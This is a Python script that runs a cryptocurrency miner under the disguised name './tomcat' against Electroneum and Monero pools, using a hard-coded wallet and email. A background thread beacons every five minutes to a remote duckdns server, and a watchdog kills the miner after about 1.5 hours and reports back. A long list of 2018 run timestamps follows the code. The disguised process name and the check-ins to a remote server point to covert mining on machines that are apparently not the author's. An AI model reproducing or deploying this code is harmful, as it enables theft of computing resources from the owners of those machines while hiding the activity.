import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:05.922842
#2018-02-17 16:59:06.262009
#2018-02-17 18:34:01.812570
#2018-02-17 20:08:06.880979
#2018-02-17 21:41:02.014521
#2018-02-17 23:12:05.797119
#2018-02-18 00:47:07.119774
#2018-02-18 02:24:04.233882
#2018-02-18 03:53:04.583620
#2018-02-18 05:26:05.254085
#2018-02-18 07:04:07.066625
#2018-02-18 08:34:04.031580
#2018-02-18 10:09:04.448956
#2018-02-18 11:41:03.845947
#2018-02-18 13:13:05.350504
#2018-02-18 14:49:01.499208
#2018-02-18 16:25:08.321843
#2018-02-18 17:59:04.147954
#2018-02-18 19:31:06.116871
#2018-02-18 21:06:01.957205
#2018-02-18 22:37:06.031945
#2018-02-19 00:15:03.989103
#2018-02-19 01:45:07.810664
#2018-02-19 03:20:06.379775
#2018-02-19 04:52:01.916061
#2018-02-19 06:23:06.108518
#2018-02-19 08:01:06.721879
#2018-02-19 09:36:05.416493
#2018-02-19 11:08:08.167406
#2018-02-19 12:39:09.251718
#2018-02-19 14:11:06.218060
#2018-02-19 15:47:04.678849
#2018-02-19 17:17:07.577173
#2018-02-19 18:50:04.796514
#2018-02-19 20:24:02.147463
#2018-02-19 22:02:07.268544
#2018-02-19 23:32:05.774545
#2018-02-20 01:06:03.517519
#2018-02-20 02:43:01.914423
#2018-02-20 04:17:05.879160
#2018-02-20 05:44:09.845498
#2018-02-20 07:18:07.756653
#2018-02-20 08:53:06.850498
#2018-02-20 10:24:03.734467
#2018-02-20 11:57:06.179556
#2018-02-20 13:34:06.644064
#2018-02-20 15:03:07.158844
#2018-02-20 16:39:09.789864
#2018-02-20 18:14:05.438878
#2018-02-20 19:52:01.844043
#2018-02-20 21:22:02.180562
#2018-02-20 22:54:06.765178
#2018-02-21 00:25:01.514506
#2018-02-21 02:03:08.188039
#2018-02-21 03:38:05.476570
#2018-02-21 05:14:01.816001
#2018-02-21 06:47:04.278302
#2018-02-21 08:17:01.932708
#2018-02-21 09:51:07.069107
#2018-02-21 11:27:08.677725
#2018-02-21 12:58:08.090101
#2018-02-21 14:34:06.349913
#2018-02-21 16:06:07.534355
#2018-02-21 17:43:05.352654
#2018-02-21 19:13:07.573508
#2018-02-21 20:48:08.218513
#2018-02-21 22:21:08.468324
#2018-02-21 23:56:01.952700
#2018-02-22 01:32:05.348331
#2018-02-22 03:05:09.315255
#2018-02-22 04:37:03.703256
#2018-02-22 06:10:09.582661
#2018-02-22 07:44:04.964170
#2018-02-22 09:18:04.449787
#2018-02-22 10:52:08.173884
#2018-02-22 12:26:06.786479
#2018-02-22 13:58:04.491849
#2018-02-22 15:36:01.665986
#2018-02-22 17:06:07.674319
#2018-02-22 18:41:07.278109
#2018-02-22 20:21:01.607373
#2018-02-22 21:49:05.494410
#2018-02-22 23:20:06.807439
#2018-02-23 00:55:01.290625
#2018-02-23 02:27:06.152974
#2018-02-23 04:01:01.713977
#2018-02-23 05:40:03.198650
#2018-02-23 07:17:05.507418
#2018-02-23 08:57:06.781356
#2018-02-23 10:56:01.840727
#2018-02-23 12:03:07.293784
#2018-02-23 13:40:01.283276
#2018-02-23 15:09:02.079526
#2018-02-23 16:45:08.515042
#2018-02-23 18:16:03.614392
#2018-02-23 19:48:08.570218
#2018-02-23 21:19:04.346748
#2018-02-23 22:56:07.794195
#2018-02-24 00:33:07.722151
#2018-02-24 02:21:06.345500
#2018-02-24 03:53:04.678094
#2018-02-24 05:20:03.958365
#2018-02-24 06:57:06.075759
#2018-02-24 08:31:01.574126
#2018-02-24 09:59:04.281841
#2018-02-24 11:43:07.617691
#2018-02-24 13:10:05.051697
#2018-02-24 14:41:07.925350
#2018-02-24 16:16:07.635118
#2018-02-24 17:53:05.361725
#2018-02-24 19:21:04.599974
#2018-02-24 20:56:05.723858
#2018-02-24 22:51:03.460713
#2018-02-25 01:23:05.332595
#2018-02-25 04:58:04.733744
#2018-02-25 09:37:01.740384